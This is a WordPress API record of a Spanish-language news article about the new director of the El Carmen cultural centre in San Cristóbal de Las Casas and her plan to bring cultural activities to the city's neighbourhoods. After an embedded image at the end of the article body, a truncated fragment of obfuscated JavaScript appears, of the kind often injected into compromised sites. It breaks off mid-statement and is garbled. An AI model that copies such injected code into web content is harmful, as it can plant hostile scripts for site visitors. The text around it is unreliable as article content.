{"id":19568,"date":"2025-01-03T01:50:39","date_gmt":"2025-01-03T01:50:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19568"},"modified":"2025-01-03T01:50:40","modified_gmt":"2025-01-03T01:50:40","slug":"buscaran-fortalecer-la-cultura-en-barrios-y-colonias-de-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19568","title":{"rendered":"Buscar\u00e1n fortalecer la cultura en barrios y colonias de SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"770\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250102-WA0014-1024x770.jpg\" alt=\"\" class=\"wp-image-19569\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250102-WA0014-1024x770.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250102-WA0014-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250102-WA0014-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250102-WA0014.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal&nbsp;<\/p>\n\n\n\n<p>2 de enero del 2024. San Crist\u00f3bal de Las Casas.- El Centro Cultural El Carmen se prepara para una nueva etapa bajo la direcci\u00f3n de Marina Ileana Mart\u00ednez Romero, quien anunci\u00f3 una serie de proyectos encaminados a ampliar la oferta cultural tanto dentro del recinto como en los barrios, colonias y comunidades de la ciudad.<\/p>\n\n\n\n<p>&nbsp;En entrevista, Mart\u00ednez Romero expres\u00f3 su compromiso con los programas ya establecidos y adelant\u00f3 que su principal misi\u00f3n ser\u00e1 descentralizar la cultura. \u201cRespetaremos los proyectos que ya existen en el Centro Cultural. La estrategia principal es continuar con los talleres que se imparten y abrir otras actividades.&nbsp;<\/p>\n\n\n\n<p>El proyecto inicial es sacar la cultura del centro. Queremos llevar movilidades culturales a las colonias y barrios\u201d, se\u00f1al\u00f3. Para lograr este objetivo, la Directora del Centro Cultural est\u00e1 trabajando en alianzas estrat\u00e9gicas con el Ayuntamiento y otras dependencias, con la intenci\u00f3n de generar un impacto significativo en la poblaci\u00f3n.<\/p>\n\n\n\n<p>Entre las actividades que se mantendr\u00e1n est\u00e1 el Jard\u00edn del Arte, un espacio que se realiza todos los s\u00e1bados a partir de las 10 de la ma\u00f1ana y que re\u00fane a artistas locales. Sobre este evento, Mart\u00ednez Romero destac\u00f3 su relevancia y asegur\u00f3 que continuar\u00e1n apoyando a los creadores de la regi\u00f3n. \u201cEl Jard\u00edn del Arte es un espacio que gusta mucho, y la intenci\u00f3n es seguir por ese camino, generando m\u00e1s alianzas con los artistas\u201d, afirm\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/mail.google.com\/mail\/?ui=2&amp;ik=5bb6f34325&amp;attid=0.1&amp;th=194298c94480647b&amp;view=fimg&amp;fur=ip&amp;rm=194298c94480647b&amp;sz=w1600-h1000&amp;attbid=ANGjdJ_7ynY5lGgXEsZvhbEZH6iugbDZV3Yi1jkfBZ-Pvdh5yIPNj4fmX_anSLqRLvnO6S7LxNBQm67779YJJLr0_UAPyhI4zhS-XQf_-zsk6_lj11jv88Czl5hXAvc&amp;disp=emb&amp;realattid=43CBFF88-5DE3-416C-9BC9-BA690387976D&amp;zw\/downloaded\" alt=\"\"\/><\/figure>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal&nbsp; 2 de enero del 2024. San Crist\u00f3bal de Las Casas.- El Centro Cultural El Carmen se prepara para una nueva etapa bajo la direcci\u00f3n de Marina Ileana Mart\u00ednez Romero, quien anunci\u00f3 una serie de proyectos encaminados a ampliar la oferta cultural tanto dentro del recinto como en los barrios, colonias y comunidades &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19569,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19568","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19568","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19568"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19568\/revisions"}],"predecessor-version":[{"id":19570,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19568\/revisions\/19570"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19569"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19568"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19568"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19568"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}